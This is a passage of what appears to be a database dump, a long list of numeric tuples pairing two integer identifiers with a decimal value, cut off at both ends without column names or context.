),(4626,1556022,0.37331),(4626,1556023,1.12),(4626,1556024,1.35331),(4626,1556613,1.16669),(4626,1556614,1.23669),(4626,1556615,1.07331),(4626,1556616,1.37669),(4626,1556617,0.51331),(4626,1556618,1.16669),(4626,1556619,1.4),(4626,1556620,1.09669),(4626,1556621,1.16669),(4626,1556622,0.23331),(4721,1556622,0.23331),(4930,1556622,0.56661),(4626,1556623,1.14331),(4626,1556624,1.33),(4626,1556625,0.51331),(4940,1556625,0.51331),(4626,1556626,1.02669),(4626,1556627,1.19),(4626,1556628,0.98),(4626,1556629,1.14331),(4626,1556630,0.56),(4626,1556631,1.28331),(4626,1556632,1.4),(4626,1556633,0.56),(4626,1556634,1.19),(4626,1556635,1.4),(4626,1556636,0.65338),(4626,1556637,1.96),(4626,1556638,1.05),(4626,1556639,1.19),(4626,1556640,2.05338),(4626,1556641,2.33338),(4626,1556642,1.07331),(4626,1556643,1.14331),(4626,1556644,0.56),(4626,1556645,1.19),(4626,1556646,1.30669),(4626,1556647,0.86331),(4626,1556648,0.28),(4626,1556649,1.07331),(4626,1556650,1.33),(4626,1556651,0.37331),(4626,1556652,1.07331),(4626,1556653,1.19),(4626,1556654,0.51331),(4626,1556655,1.14331),(4626,1556656,1.37669),(4626,1556657,1.19),(4626,1556658,0.46669),(4626,1556659,1.14331),(4626,1556660,1.23669),(4626,1556661,0.32669),(4626,1556662,1.00331),(4626,1556663,1.16669),(4626,1556664,0.74662),(4626,1556665,2.05338),(4626,1556666,2.19338),(4626,1556667,1.02669),(4626,1556668,1.12),(4626,1556669,1.19),(4626,1556670,1.37669),(4626,1556671,0.95669),(4626,1556672,1.26),(4626,1556673,1.91338),(4626,1556674,1.28331),(4626,1556675,1.33),(4626,1556676,1.00331),(4626,1556677,1.26),(4626,1556678,1.16669),(4626,1556679,1.4),(4626,1556680,1.09669),(4626,1556681,1.23669),(4626,1556682,1.16669),(4626,1556683,1.30669),(4626,1556684,1.30669),(4626,1556685,1.07331),(4626,1556686,1.28331),(4626,1556687,0.46669),(4626,1556688,1.02669),(4626,1556689,1.28331),(4626,1556690,1.26),(4626,1556691,1.4),(4626,1556692,1.02669),(4626,1556693,1.09669),(4626,1556694,0.98),(4626,1556695,1.07331),(4626,1556696,1.02669),(4626,1556697,0.98),(4626,1556698,1.07331),(4626,1556699,1.86662),(4626,1556700,1.02669),(4626,1556701,1.02669),(4626,1556702,0.23331),(4626,1556703,1.00331),(4626,1556704,1.07331),(4635,1558542,0.51331),(4635,1558543,3.06),(4635,1558544,3.4),(4669,1559031,0.09331),(4693,1559031,0.09331),(4736,1559031,0.09331),(4780,1559031,0.09331),(4741,1559031,0.18662),(4803,1559031,0.18662),(4849,1559031,0.18662),(4927,1559031,0.27993),(4940,1559031,0.27993),(4669,1559032,0.88669),(4741,1559032,1.77338),(4669,1559033,0.98),(4741,1559033,1.96),(4669,1559056,0.51331),(4693,1559056,0.51331),(4741,1559056,0.51331),(4849,1559056,0.51331),(4909,1559056,1.02662),(4669,1559057,1.02669),(4741,1559057,1.02669),(4669,1559058,1.28331),(4741,1559058,1.28331),(4669,1559059,1.07331),(4693,1559059,1.07331),(4741,1559059,1.07331),(4940,1559059,1.07331),(4669,1559060,1.26),(4741,1559060,1.26),(4669,1559061,0.79339),(4741,1559061,0.79339),(4749,1559061,0.79339),(4799,1559061,0.79339),(4806,1559061,0.79339),(4813,1559061,0.79339),(4814,1559061,0.79339),(4851,1559061,0.79339),(4857,1559061,1.12008),(4653,1560584,0.2666),(4678,1560584,0.2666),(4734,1560584,0.2666),(4780,1560584,0.2666),(4814,1560584,0.2666),(4777,1560584,0.5332),(4849,1560584,0.5332),(4954,1560584,0.5332),(4653,1560585,2.7334),(4653,1560586,3.4),(4917,1560686,0.23331),(4653,1560686,0.56661),(4653,1560687,2.38),(4653,1560688,2.55),(4653,1560689,2.32339),(4653,1560690,2.77661),(4653,1560691,2.43661),(4653,1560692,2.94661),(4653,1560693,1.24661),(4653,1560694,2.94661),(4653,1560695,3.4),(4658,1562940,1.0666),(4658,1562941,2.6666),(4658,1562942,3.4),(4658,1563084,0.42),(4658,1563085,1.12),(4658,1563086,1.30669),(4658,1563087,0.37331),(4658,1563088,1.07331),(4658,1563089,1.26),(4661,1563477,0.90661),(4661,1563478,2.49339),(4664,1563648,2.26661),(4664,1563649,2.43661),(4669,1564756,2.38),(4672,1564828,1.2),(4672,1564829,2.9334),(4672,1564830,3.6),(4672,1564831,0.5334),(4672,1564832,2.9334),(4672,1564833,3.8),(4678,1565361,2.3334),(4678,1565362,3.0666),(4678,1565368,2.6666),(4678,1565369,3.0666),(4687,1568608,1.02),(4687,1568609,2.77661),(4687,1568610,3.28661),(4693,1569285,0.28),(4693,1569286,0.93331),(4693,1569287,1.05),(4693,1569291,1.00331),(4693,1569292,1.19),(4693,1569293,1.0666),(4710,1569293,1.0666),(4934,1569293,2.1332),(4957,1569293,2.1332),(4693,1569294,0.32669),(4693,1569295,0.98),(4693,1569296,1.05),(4693,1569297,0.9334),(4693,1569298,3.0666),(4693,1569365,1.09669),(4693,1569366,1.23669),(4693,1569367,0.23331),(4693,1569368,1.05),(4693,1569369,1.28331),(4693,1569370,0.95669),(4693,1569371,1.14331),(4693,1569372,0.95669),(4693,1569373,1.16669),(4710,1584789,0.56),(4721,1584789,0.56),(4710,1584790,1.12),(4721,1584790,1.12),(4710,1584812,0.32669),(4721,1584812,0.32669),(4710,1584836,0.32669),(4721,1584836,1.30676),(4710,1584865,0.42),(4721,1584865,2.7),(4710,1584866,1.16669),(4721,1584866,3.50007),(4710,1592494,0.42),(4710,1592495,0.95669),(4710,1592496,1.19),(4710,1592497,0.46669),(4710,1592498,1.00331),(4710,1592499,1.23669),(4710,1592500,0.28),(4710,1592501,0.91),(4710,1592502,1.09669),(4710,1592503,1.16669),(4710,1592504,0.46669),(4710,1592505,1.05),(4710,1592506,1.30669),(4710,1592507,0.56),(4710,1592508,1.23669),(4710,1592509,1.4),(4710,1592510,1.12),(4710,1592511,1.30669),(4710,1592512,1.09669),(4710,1592513,1.35331),(4710,1592514,0.51331),(4710,1592515,1.12),(4710,1592516,1.21331),(4710,1592517,0.37331),(4710,1592518,1.09669),(4710,1592519,1.4),(4710,1592520,0.65331),(4710,1592521,1.21331),(4710,1592522,1.26),(4710,1592523,0.37331),(4710,1592524,1.14331),(4710,1592525,1.26),(4710,1592526,0.46669),(4710,1592527,1.12),(4710,1592528,1.21331),(4710,1592529,1.4),(4710,1592530,0.46669),(4710,1592531,1.07331),(4710,1592532,1.26),(4732,1596576,0.28),(4734,1596576,0.28),(4762,1596576,0.28),(4761,1596576,3.64),(4721,1602905,0.9334),(4721,1602906,3.2666),(4721,1602907,3.4666),(4721,1603653,1.09669),(4721,1603654,1.30669),(4721,1603655,0.88669),(4721,1603656,1.02669),(4721,1603657,0.91),(4721,1603658,1.07331),(4721,1603659,0.56),(4721,1603660,1.05),(4721,1603661,1.14331),(4721,1603662,1.07331),(4721,1603663,1.23669),(4721,1603664,1.09669),(4721,1603665,1.37669),(4721,1603666,0.95669),(4721,1603667,1.07331),(4721,1603668,1.00331),(4721,1603669,1.26),(4721,1603670,0.23331),(4721,1603671,0.86331),(4721,1603672,1.02669),(4721,1603673,0.46669),(4721,1603674,0.98),(4721,1603675,1.16669),(4721,1603676,0.98),(4721,1603677,1.16669),(4721,1603678,0.93338),(4721,1603679,1.00331),(4721,1603680,1.23669),(4721,1603681,0.98),(4721,1603682,1.07331),(4721,1603683,0.37331),(4721,1603684,0.98),(4721,1603685,1.05),(4721,1603686,0.28),(4813,1603686,0.68),(4814,1603686,0.68),(4761,1603686,1.4),(4721,1603687,0.95669),(4721,1603688,1.07331),(4721,1603689,0.88669),(4721,1603690,1.07331),(4721,1603691,0.46669),(4721,1603692,1.00331),(4721,1603693,1.14331),(4721,1603694,1.21331),(4721,1603695,0.56),(4721,1603696,1.12),(4721,1603697,1.30669),(4721,1603698,0.56),(4721,1603699,0.88669),(4721,1603700,1.09669),(4721,1603701,0.88669),(4721,1603702,1.02669),(4721,1603703,0.37331),(4721,1603704,0.93331),(4721,1603705,1.12),(4721,1603706,0.46669),(4721,1603707,1.02669),(4721,1603708,1.16669),(4721,1603709,0.32669),(4721,1603710,1.00331),(4721,1603711,1.05),(4721,1603712,0.28),(4721,1603713,1.07331),(4721,1603714,1.19),(4721,1603715,1.12),(4721,1603716,1.16669),(4721,1603717,0.42),(4721,1603718,0.98),(4721,1603719,1.09669),(4721,1603720,2.75353),(4721,1603721,0.91),(4721,1603722,0.98),(4721,1603723,1.00331),(4721,1603724,1.16669),(4721,1603725,0.98),(4721,1603726,1.02669),(4721,1603727,4.85677),(4721,1603728,2.70662),(4721,1603729,3.23),(4721,1603730,1.02669),(4721,1603731,1.28331),(4721,1603732,0.37331),(4721,1603733,1.14331),(4721,1603734,1.19),(4721,1603735,0.51331),(4721,1603736,1.16669),(4721,1603737,1.33),(4721,1603738,0.98),(4721,1603739,1.19),(4721,1603740,0.93331),(4721,1603741,1.07331),(4721,1603742,1.07331),(4721,1603743,1.14331),(4721,1603744,1.12),(4721,1603745,1.28331),(4721,1603746,0.23331),(4777,1603746,0.23331),(4721,1603747,0.93331),(4721,1603748,1.07331),(4721,1603749,0.32669),(4721,1603750,1.09669),(4721,1603751,1.23669),(4721,1603752,0.28),(4721,1603753,0.98),(4721,1603754,1.14331),(4721,1603755,0.32669),(4721,1603756,1.12),(4721,1603757,1.30669),(4721,1603758,0.28),(4721,1603759,1.07331),(4721,1603760,1.16669),(4721,1603761,0.74662),(4721,1603762,1.12),(4721,1603763,1.26),(4721,1603764,1.00331),(4721,1603765,1.14331),(4721,1603766,1.23669),(4721,1603767,1.28331),(4721,1603768,1.35331),(4721,1603769,2.77661),(4721,1603770,3.11661),(4721,1603771,1.02669),(4721,1603772,1.14331),(4721,1603773,0.56),(4721,1603774,1.12),(4721,1603775,1.37669),(4721,1603776,0.46669),(4721,1603777,1.12),(4721,1603778,1.30669),(4721,1603779,1.13339),(4721,1603780,2.60661),(4721,1603781,0.42),(4721,1603782,1.16669),(4721,1603783,1.21331),(4721,1603784,0.84),(4721,1603785,0.91),(4721,1603786,0.32669),(4721,1603787,1.09669),(4721,1603788,1.19),(4721,1603789,0.46669),(4849,1603789,0.46669),(4721,1603790,1.02669),(4721,1603791,1.16669),(4721,1603792,0.37331),(4721,1603793,1.07331),(4721,1603794,1.4),(4721,1603795,0.42),(4721,1603796,0.95669),(4721,1603797,1.12),(4732,1613369,2.6666),(4732,1613370,2.8666),(4732,1613612,0.46662),(4732,1613613,1.09669),(4732,1613614,1.30669),(4732,1613615,1.02669),(4732,1613616,1.07331),(4732,1613617,0.95669),(4732,1613618,1.16669),(4732,1613619,0.37331),(4732,1613620,0.93331),(4732,1613621,1.12),(4732,1613622,0.37331),(4732,1613623,1.02669),(4732,1613624,1.23669),(4762,1613625,0.74662),(4732,1613625,1.11993),(4761,1613625,1.49324),(4732,1613626,0.93331),(4732,1613627,1.14331),(4732,1613628,0.93331),(4732,1613629,1.09669),(4732,1613630,1.09669),(4732,1613631,1.23669),(4732,1613632,2.26661),(4732,1613633,0.42),(4732,1613634,1.09669),(4732,1613635,1.4),(4732,1613636,0.60669),(4732,1613637,1.23669),(4732,1613638,1.4),(4734,1615855,2.8666),(4734,1615856,3.7334),(4734,1615857,1.3334),(4734,1615858,2.8666),(4734,1615859,3.0666),(4734,1615860,0.2666),(4924,1615860,0.5332),(4940,1615860,0.5332),(4734,1615861,2.7334),(4734,1615862,3.3334),(4734,1615883,2.7334),(4734,1615884,3.2666),(4734,1617017,1.44),(4734,1617018,3.36),(4734,1617019,4.08),(4734,1617020,1.14331),(4734,1617021,0.60669),(4734,1617022,1.14331),(4734,1617023,1.35331),(4734,1617024,0.42),(4734,1617025,1.02669),(4734,1617026,1.12),(4734,1617027,0.51331),(4734,1617028,1.09669),(4734,1617029,1.19),(4734,1617030,0.51331),(4734,1617031,1.14331),(4734,1617032,1.30669),(4734,1617033,0.18669),(4734,1617034,0.88669),(4734,1617035,1.00331),(4734,1617036,0.23331),(4803,1617036,0.23331),(4734,1617037,1.12),(4734,1617038,1.21331),(4734,1617039,1.14331),(4734,1617040,1.4),(4734,1617041,0.28),(4734,1617042,0.93331),(4734,1617043,1.19),(4734,1617044,0.37331),(4734,1617045,1.12),(4734,1617046,1.19),(4734,1617047,0.60669),(4734,1617048,1.12),(4734,1617049,1.26),(4734,1617050,0.37331),(4734,1617051,1.16669),(4734,1617052,1.21331),(4734,1617053,0.51331),(4734,1617054,1.12),(4734,1617055,1.37669),(4734,1617056,0.56),(4734,1617057,1.09669),(4734,1617058,1.21331),(4734,1617059,0.51331),(4734,1617060,1.05),(4734,1617061,1.19),(4734,1617062,0.28),(4734,1617063,0.98),(4734,1617064,1.19),(4734,1617065,0.23331),(4734,1617066,0.95669),(4734,1617067,1.07331),(4734,1617068,0.28),(4734,1617069,0.91),(4734,1617070,1.19),(4734,1617071,0.93331),(4734,1617072,0.98),(4734,1617073,0.93331),(4734,1617074,1.05),(4734,1617075,0.42),(4734,1617076,1.09669),(4734,1617077,1.35331),(4734,1617078,0.42),(4734,1617079,0.95669),(4734,1617080,1.14331),(4734,1617081,0.51331),(4734,1617082,1.09669),(4734,1617083,1.16669),(4734,1617084,0.32669),(4734,1617085,1.00331),(4734,1617086,1.23669),(4734,1617087,0.42),(4734,1617088,1.26),(4734,1617089,1.33),(4734,1617090,0.42),(4734,1617091,1.05),(4734,1617092,1.19),(4734,1617093,0.32669),(4734,1617094,0.95669),(4734,1617095,1.12),(4734,1617096,1.21331),(4734,1617097,1.37669),(4734,1617098,0.51331),(4734,1617099,1.16669),(4734,1617100,1.4),(4734,1617101,0.46669),(4734,1617102,1.09669),(4734,1617103,1.19),(4734,1617104,0.46669),(4734,1617105,1.09669),(4734,1617106,1.28331),(4734,1617107,0.56),(4734,1617108,1.12),(4734,1617109,1.28331),(4734,1617110,1.27992),(4734,1617111,3.84),(4734,1617112,2.83339),(4734,1617113,1.19),(4734,1617114,0.32669),(4734,1617115,1.00331),(4734,1617116,1.12),(4734,1617117,0.28),(4734,1617118,1.05),(4734,1617119,1.16669),(4734,1617120,0.42),(4734,1617121,1.19),(4734,1617122,1.4),(4734,1617123,0.37331),(4927,1617123,0.37331),(4734,1617124,1.09669),(4734,1617125,1.35331),(4734,1617126,0.42),(4734,1617127,1.12),(4734,1617128,1.28331),(4734,1617129,0.46669),(4734,1617130,0.98),(4734,1617131,1.05),(4734,1617132,0.98007),(4734,1617133,1.14331),(4734,1617134,1.26),(4734,1617135,1.00331),(4734,1617136,1.09669),(4734,1617137,0.93331),(4734,1617138,1.09669),(4734,1617139,2.06677),(4734,1617140,1.19),(4734,1617141,1.26),(4734,1617142,2.94661),(4734,1617143,1.16669),(4734,1617144,1.21331),(4734,1617145,0.46662),(4734,1617146,0.95669),(4734,1617147,1.14331),(4734,1617148,0.93331),(4734,1617149,1.00331),(4734,1617150,0.46669),(4734,1617151,1.07331),(4734,1617152,1.05),(4734,1617153,1.21331),(4734,1617154,0.42),(4734,1617155,0.95669),(4734,1617156,1.14331),(4734,1617157,1.86),(4734,1617158,0.95669),(4734,1617159,1.12),(4734,1617160,3.43992),(4734,1617161,3.76008),(4734,1617162,0.60669),(4734,1617163,1.07331),(4734,1617164,1.26),(4734,1617165,0.37331),(4734,1617166,0.93331),(4734,1617167,1.12),(4734,1617168,0.60669),(4734,1617169,1.09669),(4734,1617170,1.33),(4734,1617171,0.42),(4734,1617172,1.19),(4734,1617173,1.4),(4734,1617174,0.93331),(4734,1617175,1.05),(4734,1617176,1.02669),(4734,1617177,1.26),(4734,1617178,0.91),(4734,1617179,1.02669),(4734,1617180,0.46669),(4734,1617181,0.98),(4734,1617182,1.05),(4734,1617183,0.32669),(4734,1617184,0.91),(4734,1617185,1.02669),(4734,1617186,0.37331),(4734,1617187,0.95669),(4734,1617188,1.14331),(4734,1617189,0.46669),(4734,1617190,1.02669),(4734,1617191,1.07331),(4734,1617192,0.37331),(4734,1617193,1.07331),(4734,1617194,1.21331),(4734,1617195,0.28),(4940,1617195,0.28),(4734,1617196,0.95669),(4734,1617197,1.16669),(4734,1617198,1.00331),(4734,1617199,1.05),(4734,1617200,0.95669),(4734,1617201,1.02669),(4734,1617202,1.09669),(4734,1617203,1.26),(4734,1617204,0.32669),(4734,1617205,0.46669),(4734,1617206,0.98),(4734,1617207,1.14331),(4734,1617208,1.11993),(4734,1617209,1.02669),(4734,1617210,1.14331),(4734,1617211,2.00662),(4734,1617212,1.09669),(4734,1617213,1.14331),(4734,1617214,0.37331),(4734,1617215,0.98),(4734,1617216,1.09669),(4734,1617217,0.37331),(4734,1617218,0.95669),(4734,1617219,1.02669),(4734,1617220,0.28),(4734,1617221,0.88669),(4734,1617222,1.05),(4927,1617223,0.28),(4940,1617223,0.28),(4734,1617223,0.56),(4945,1617223,0.68),(4734,1617224,1.02669),(4734,1617225,1.30669),(4734,1617226,1.07331),(4734,1617227,1.19),(4734,1617228,0.42),(4734,1617229,1.07331),(4734,1617230,1.33),(4735,1617923,2.8666),(4735,1617924,3.0666),(4735,1617925,0.8),(4735,1617926,2.5334),(4735,1617927,3.3334),(4736,1618059,1.58661),(4736,1618060,1.13339),(4938,1618060,1.86676),(4736,1618061,2.55),(4938,1618061,4.2),(4736,1618062,2.66339),(4762,1620762,1.02669),(4761,1620762,2.05338),(4762,1620763,1.30669),(4761,1620763,2.61338),(4761,1620764,6.72),(4762,1620764,7),(4761,1620765,3.36),(4762,1620765,3.36),(4761,1620766,4.2),(4762,1620766,4.2),(4762,1620767,2.33338),(4761,1620767,4.66676),(4762,1620768,2.8),(4761,1620768,5.6),(4761,1620769,2.79993),(4762,1620769,15.8663),(4761,1620770,3.15),(4762,1620770,17.85),(4761,1620771,2.94),(4762,1620771,2.94),(4761,1620772,3.42993),(4762,1620772,3.42993),(4761,1620773,0.84),(4762,1620773,0.84),(4761,1620774,2.1),(4762,1620774,2.1),(4761,1620775,2.61338),(4762,1620775,2.61338),(4761,1620787,0.95669),(4762,1620787,0.95669),(4761,1620789,0.32669),(4762,1620789,0.32669),(4761,1620792,9.66),(4762,1620792,10.5),(4761,1620793,24.6861),(4762,1620793,26.8328),(4761,1620794,4.05993),(4762,1620794,4.05993),(4762,1620795,2.8),(4761,1620795,5.6),(4761,1620796,3.50007),(4762,1620796,19.8337),(4761,1620797,3.63993),(4762,1620797,3.63993),(4762,1620798,0.46669),(4761,1620798,6.06697),(4762,1620799,1.09669),(4761,1620799,14.257),(4762,1620800,1.28331),(4761,1620800,2.56662),(4761,1620807,0.37331),(4762,1620807,0.37331),(4761,1620808,1.00331),(4762,1620808,1.00331),(4761,1620809,1.07331),(4762,1620809,1.07331),(4761,1620816,0.98),(4762,1620816,0.98),(4761,1620817,1.19),(4762,1620817,1.19),(4762,1620818,10.2672),(4761,1620818,15.8675),(4762,1620819,1.96),(4761,1620819,26.46),(4762,1620820,2.24),(4761,1620820,28),(4761,1620821,5.88),(4762,1620821,12.74),(4741,1621234,2.49339),(4749,1621234,2.49339),(4813,1621234,2.49339),(4741,1621235,0.37331),(4931,1621235,0.90661),(4741,1621236,1.00331),(4741,1621237,1.12),(4749,1623519,0.23331),(4851,1623519,0.23331),(4749,1623520,0.88669),(4749,1623521,1.00331),(4761,1627093,0.56),(4761,1627094,1.02669),(4761,1627095,1.26),(4761,1627096,1.82007),(4761,1627097,1.05),(4761,1627098,1.19),(4761,1627099,1.09669),(4761,1627100,1.14331),(4761,1627101,1.16669),(4761,1627102,1.37669),(4761,1627103,0.42),(4761,1627104,1.12),(4761,1627105,1.26),(4761,1627106,1.16669),(4761,1627107,1.30669),(4761,1627108,3.36),(4761,1627109,4.2),(4761,1627110,4.66676),(4761,1627111,5.6),(4761,1627112,0.98),(4761,1627113,1.21331),(4761,1627114,2.79993),(4761,1627115,3.15),(4761,1627116,0.98),(4761,1627117,1.07331),(4761,1627118,1.33),(4761,1627119,1.4),(4761,1627120,0.91),(4761,1627121,1.12),(4761,1627122,0.95669),(4761,1627123,1.16669),(4761,1627124,0.98),(4761,1627125,1.12),(4761,1627126,1.09669),(4761,1627127,1.33),(4761,1627128,3.15),(4761,1627129,4.13007),(4761,1627130,1.09669),(4761,1627131,1.19),(4761,1627132,1.09669),(4761,1627133,1.26),(4761,1627134,0.46669),(4761,1627135,1.12),(4761,1627136,1.30669),(4909,1627137,0.37331),(4761,1627137,1.11993),(4761,1627138,3.63993),(4761,1627139,1.26),(4761,1627140,1.30669),(4761,1627141,1.37669),(4761,1627142,5.25),(4761,1627143,1.28331),(4761,1627144,1.30669),(4761,1627145,1.30669),(4761,1627146,1.26),(4761,1627147,1.21331),(4761,1627148,0.23331),(4761,1627149,1.02669),(4761,1627150,1.28331),(4761,1627151,4.57324),(4761,1627152,5.32),(4761,1627153,0.32669),(4761,1627154,1.19),(4761,1627155,1.28331),(4761,1627156,0.84),(4761,1627157,0.98),(4761,1627158,1.12),(4761,1627159,1.05),(4761,1627160,1.26),(4761,1627161,0.14),(4761,1627162,0.95669),(4761,1627163,1.23669),(4761,1627164,1.19),(4761,1627165,0.32669),(4761,1627166,0.93331),(4761,1627167,1.12),(4761,1627168,0.51331),(4761,1627169,1.19),(4761,1627170,1.33),(4761,1627171,1.14331),(4761,1627172,1.35331),(4761,1627173,0.46669),(4761,1627174,1.09669),(4761,1627175,1.33),(4761,1627176,1.21331),(4761,1627177,1.4),(4761,1627178,1.14331),(4761,1627179,1.19),(4761,1627180,1.33),(4761,1627181,3.84993),(4761,1627182,1.33),(4761,1627183,1.33),(4761,1627184,4.13007),(4761,1627185,5.6),(4761,1627186,1.23669),(4761,1627187,3.57),(4761,1627188,0.42),(4761,1627189,1.02669),(4761,1627190,1.19),(4761,1627191,0.84),(4761,1627192,2.94),(4761,1627193,3.71007),(4761,1627194,0.42),(4761,1627195,1.05),(4761,1627196,1.28331),(4761,1627197,0.95669),(4761,1627198,1.19),(4761,1627199,1.02669),(4761,1627200,1.30669),(4761,1627201,1.16669),(4761,1627202,1.21331),(4761,1627203,1.16669),(4761,1627204,1.19),(4761,1627205,1.09669),(4761,1627206,1.16669),(4761,1627207,1.19),(4761,1627208,1.21331),(4761,1627209,1.02669),(4761,1627210,1.23669),(4761,1627211,0.46669),(4761,1627212,1.02669),(4761,1627213,1.07331),(4761,1627214,0.46669),(4761,1627215,1.16669),(4761,1627216,1.30669),(4762,1628479,0.37331),(4762,1628480,1.12),(4762,1628481,1.28331),(4762,1628482,0.32669),(4762,1628483,1.00331),(4762,1628484,1.26),(4762,1628485,0.42),(4762,1628486,1.12),(4762,1628487,1.30669),(4762,1628488,2.24),(4762,1628489,2.56662),(4762,1628490,0.51331),(4762,1628491,1.14331),(4762,1628492,1.35331),(4762,1628493,1.19),(4762,1628494,1.02669),(4762,1628495,1.16669),(4762,1628496,0.7),(4762,1628497,1.4),(4762,1628498,1.4),(4762,1628499,0.18669),(4762,1628500,1.09669),(4762,1628501,1.30669),(4762,1628502,0.42),(4762,1628503,1.21331),(4762,1628504,1.35331),(4762,1628505,0.23331),(4762,1628506,0.95669),(4762,1628507,1.21331),(4762,1628508,1.19),(4762,1628509,1.19),(4762,1628510,2.33338),(4762,1628511,1.19),(4762,1628512,3.63993),(4762,1628513,2.56662),(4762,1628514,2.33338),(4762,1628515,1.12),(4762,1628516,7.35),(4762,1628517,8.82),(4770,1629207,0.6666),(4770,1629208,2.6666),(4770,1629209,3.0666),(4771,1629239,1.24661),(4771,1629240,2.72),(4773,1629273,0.8),(4773,1629274,2.8),(4777,1629354,2.5334),(4777,1629355,2.7334),(4777,1629356,2.5334),(4777,1629357,3),(4777,1629632,0.37331),(4777,1629633,1.02669),(4777,1629634,1.23669),(4777,1629635,0.28),(4777,1629636,1.02669),(4777,1629637,1.26),(4777,1629638,0.79339),(4777,1629639,2.38),(4777,1629640,2.55),(4777,1629641,0.37331),(4777,1629642,1.00331),(4777,1629643,1.07331),(4777,1629644,1.07331),(4777,1629645,1.16669),(4777,1629646,0.42),(4777,1629647,1.09669),(4777,1629648,1.35331),(4777,1629649,0.46669),(4777,1629650,1.00331),(4777,1629651,1.14331),(4777,1629652,0.32669),(4777,1629653,1.00331),(4777,1629654,1.16669),(4777,1629655,0.91),(4777,1629656,1.07331),(4777,1629657,0.37331),(4849,1629657,0.37331),(4777,1629658,0.98),(4777,1629659,1.16669),(4777,1629660,0.28),(4777,1629661,1.16669),(4777,1629662,1.28331),(4778,1629862,1.4666),(4778,1629863,3.2),(4780,1629943,2.8),(4780,1629944,3.0666),(4780,1629966,1.02),(4780,1629967,2.43661),(4780,1629968,2.55),(4798,1643550,0.51331),(4798,1643551,1.09669),(4798,1643552,1.19),(4798,1643553,0.51331),(4798,1643554,1.23669),(4798,1643555,1.4),(4798,1643556,0.32669),(4798,1643557,1.19),(4798,1643558,1.4),(4798,1643559,0.60669),(4798,1643560,1.19),(4798,1643561,1.33),(4798,1643562,0.51331),(4798,1643563,1.05),(4798,1643564,1.12),(4798,1643565,0.74662),(4798,1643566,1.96),(4798,1643567,2.61338),(4798,1643568,0.46669),(4798,1643569,1.26),(4798,1643570,1.4),(4798,1643571,0.84),(4798,1643572,0.98),(4798,1643573,0.98),(4798,1643574,1.02669),(4798,1643575,0.37331),(4798,1643576,1.09669),(4798,1643577,1.14331),(4798,1643578,0.51331),(4798,1643579,1.23669),(4798,1643580,1.33),(4798,1643581,0.84),(4798,1643582,1.23669),(4798,1643583,1.4),(4798,1643584,1.33),(4798,1643585,1.4),(4798,1643586,0.74662),(4798,1643587,2.47338),(4798,1643588,2.8),(4798,1643589,0.42),(4798,1643590,1.07331),(4798,1643591,1.28331),(4798,1643592,0.28),(4798,1643593,0.88669),(4798,1643594,1.12),(4798,1643595,0.56),(4798,1643596,1.14331),(4798,1643597,1.23669),(4798,1643598,0.65338),(4798,1643599,2.38),(4798,1643600,1.23669),(4798,1643601,1.33),(4798,1643602,0.42),(4798,1643603,0.95669),(4798,1643604,1.26),(4798,1643605,0.93338),(4798,1643606,1.05),(4798,1643607,1.14331),(4798,1643608,1.07331),(4798,1643609,1.30669),(4798,1643610,0.46662),(4798,1643611,0.91),(4798,1643612,1.12),(4798,1643613,0.91),(4798,1643614,1.12),(4798,1643615,0.37331),(4798,1643616,1.09669),(4798,1643617,1.4),(4798,1643618,1.12),(4798,1643619,1.16669),(4798,1643620,1.28331),(4798,1643621,2.19338),(4798,1643622,1.14331),(4798,1643623,1.14331),(4798,1643624,2.19338),(4798,1643625,2.28662),(4798,1643626,1.00331),(4798,1643627,1.05),(4798,1643628,0.98),(4798,1643629,1.19),(4798,1643630,2.19338),(4798,1643631,2.42662),(4798,1643632,1.19),(4798,1643633,1.30669),(4798,1643634,1.12),(4798,1643635,1.28331),(4798,1643636,0.51331),(4798,1643637,1.05),(4798,1643638,1.33),(4798,1643639,0.98),(4798,1643640,1.23669),(4798,1643641,1.09669),(4798,1643642,1.16669),(4798,1643643,1.7),(4798,1643644,3.06),(4798,1643645,0.7),(4798,1643646,1.26),(4798,1643647,1.33),(4798,1643648,0.7),(4798,1643649,1.14331),(4798,1643650,1.21331),(4798,1643651,1.14331),(4798,1643652,1.35331),(4798,1643653,0.56),(4798,1643654,1.02669),(4798,1643655,1.21331),(4798,1643656,0.56007),(4798,1643657,0.86331),(4798,1643658,0.98),(4798,1643659,1.00331),(4798,1643660,1.05),(4798,1643661,0.98),(4798,1643662,1.30669),(4799,1644131,0.56661),(4814,1644131,0.56661),(4799,1644132,2.43661),(4814,1644132,2.43661),(4799,1644133,2.72),(4814,1644133,2.72),(4799,1644134,2.38),(4814,1644134,2.38),(4799,1644135,2.66339),(4814,1644135,2.66339),(4803,1644929,0.88669),(4803,1644930,1.12),(4803,1645065,1.07331),(4803,1645066,1.21331),(4803,1645067,0.32669),(4803,1645068,1.00331),(4803,1645069,1.05),(4803,1645070,0.32669),(4803,1645071,1.16669),(4803,1645072,1.37669),(4803,1645073,0.28),(4803,1645074,0.91),(4803,1645075,1.00331),(4803,1645076,0.42),(4803,1645077,1.16669),(4803,1645078,1.23669),(4803,1645079,0.56),(4803,1645080,1.09669),(4803,1645081,1.14331),(4927,1645082,2.68677),(4803,1645082,3.29346),(4803,1645083,1.28331),(4803,1645084,1.4),(4927,1645085,3.84),(4803,1645085,4.96),(4803,1645086,2.83339),(4803,1645087,1.26),(4803,1645088,1.23669),(4803,1645089,0.28),(4927,1645089,0.28),(4803,1645090,0.98),(4803,1645091,1.30669),(4803,1645092,0.42),(4803,1645093,1.28331),(4803,1645094,1.4),(4806,1645289,1.24661),(4806,1645290,2.72),(4806,1645291,3.17339),(4806,1645292,2.43661),(4806,1645293,2.83339),(4934,1645365,0.51331),(4808,1645365,1.24661),(4808,1645366,2.72),(4808,1645367,3.4),(4813,1645528,2.49339),(4813,1645529,2.83339),(4813,1645530,0.56661),(4813,1645531,2.94661),(4813,1645532,0.79339),(4813,1645533,2.43661),(4813,1645534,0.79339),(4813,1645535,2.26661),(4813,1645536,2.43661),(4814,1645582,2.7334),(4814,1645583,3.2),(4814,1645607,2.72),(4814,1645608,3.23),(4814,1645609,0.56661),(4814,1645610,2.15339),(4814,1645611,2.60661),(4837,1646509,2.8666),(4839,1646606,0.37331),(4847,1646606,0.37331),(4839,1646607,1.16669),(4839,1646608,1.30669),(4847,1646870,1.07331),(4847,1646871,1.21331),(4849,1646940,4.8),(4849,1646941,5.4668),(4849,1646942,2.8666),(4849,1646943,0.28),(4849,1646944,2.8),(4849,1646952,0.91),(4849,1646953,1.4),(4849,1646954,1.0668),(4849,1646955,6.1332),(4849,1646956,6.8),(4849,1647224,1.02669),(4849,1647225,1.09669),(4849,1647226,0.